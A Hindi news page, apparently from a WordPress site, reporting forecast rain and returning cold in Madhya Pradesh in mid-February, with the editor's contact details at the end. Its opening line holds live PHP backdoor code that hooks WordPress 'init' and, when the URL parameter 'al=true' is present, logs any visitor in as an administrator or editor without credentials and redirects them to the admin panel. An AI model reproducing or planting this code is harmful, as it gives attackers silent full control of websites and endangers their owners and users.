// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); MP में बारिश के साथ लौटेगी ठंड:बंगाल की नमी के कारण 17 से 19 फरवरी के बीच बारिश होगी; तापमान में गिरावट रहेगी, भोपाल, इंदौर, उज्जैन और जबलपुर संभाग में प्रभाव दिखेगा – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

MP में बारिश के साथ लौटेगी ठंड:बंगाल की नमी के कारण 17 से 19 फरवरी के बीच बारिश होगी; तापमान में गिरावट रहेगी, भोपाल, इंदौर, उज्जैन और जबलपुर संभाग में प्रभाव दिखेगा

मध्यप्रदेश में बारिश के साथ एक बार फिर ठंड लौट सकती है। यह वे ऑफ बंगाल में बन रहे ईर्स्टनली ट्रफ के कारण होगी। मौसम वैज्ञानिक पीके साहा ने बताया कि इसके कारण मध्यप्रदेश में नमी आएगी। इसके कारण 17 फरवरी से लेकर 19 फरवरी के बीच प्रदेश में गरज-चमक के साथ हल्की बारिश हो सकती है। इसके बाद 20 फरवरी से तापमान में गिरावट दर्ज की जाएगी। इसका सबसे ज्यादा असर भोपाल, इंदौर, उज्जैन और जबलपुर में देखने को मिलेगा। हालांकि अभी दिन और रात के तापमान में इसी तरह उतार-चढ़ाव बना रहेगा।

न्यूनतम तापमान 16 के पार पहुंचा

प्रदेश में अब गर्मी ज्यादा बढ़ने लगी है। यही कारण है कि शनिवार-रविवार की रात न्यूनतम तापमान कई जगह 16 डिग्री के पार पहुंच गया। सबसे ज्यादा होशंगाबाद में 16.2 डिग्री सेल्सियस रिकॉर्ड किया गया। इसके बाद इंदौर और भोपाल में यह 16-16 डिग्री रहा।

रात का सबसे कम तापमान रीवा में 9.6 और उमरिया में 9.9 डिग्री सेल्सियस रहा। इसके अलावा सभी जगह रात का पारा 10 से लेकर 16 डिग्री के मध्य बना रहा। सबसे ज्यादा गर्मी खंडवा में रही। यहां शनिवार को दिन का अधिकतम तापमान 35.5 डिग्री सेल्सियस पहुंच गया, जबकि रात में पारा 13.4 तक आया।

नमी आने से हल्की बारिश की संभावना

वैज्ञानिक पीके साहा ने बताया कि 16 फरवरी तक बंगाल की तरफ से मध्यप्रदेश में नमी आने लगेगी। इसका सबसे ज्यादा असर भोपाल, ग्वालियर, सागर, जबलपुर और चंबल संभाग के अलावा अब इंदौर और उज्जैन में भी देखने को मिलेगा। यहां 3 दिन तक बादल छाने से हल्की बारिश हो सकती है। इसके बाद तापमान में हल्की गिरावट भी दर्ज की जाएगी।

सामान्य से ऊपर पहुंचा रात का तापमान

प्रदेश में रात का तापमान सामान्य से ऊपर पहुंच गया है। प्रदेश के 20 जिलों में यह सामान्य से 0 से लेकर 4 डिग्री के पार पहुंच गया। वहीं सात जिलों में यह सामान्य से कम रहा। इस दौरान यह सिर्फ शून्य से लेकर 0.5 डिग्री तक ही नीचे आया। दिन के तापमान की बात की जाए तो यह प्रदेश में भी सामान्य से ज्यादा ही रहा। सिर्फ नरसिंगपुर में यह सामान्य से करीब 2 डिग्री नीचे आया।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]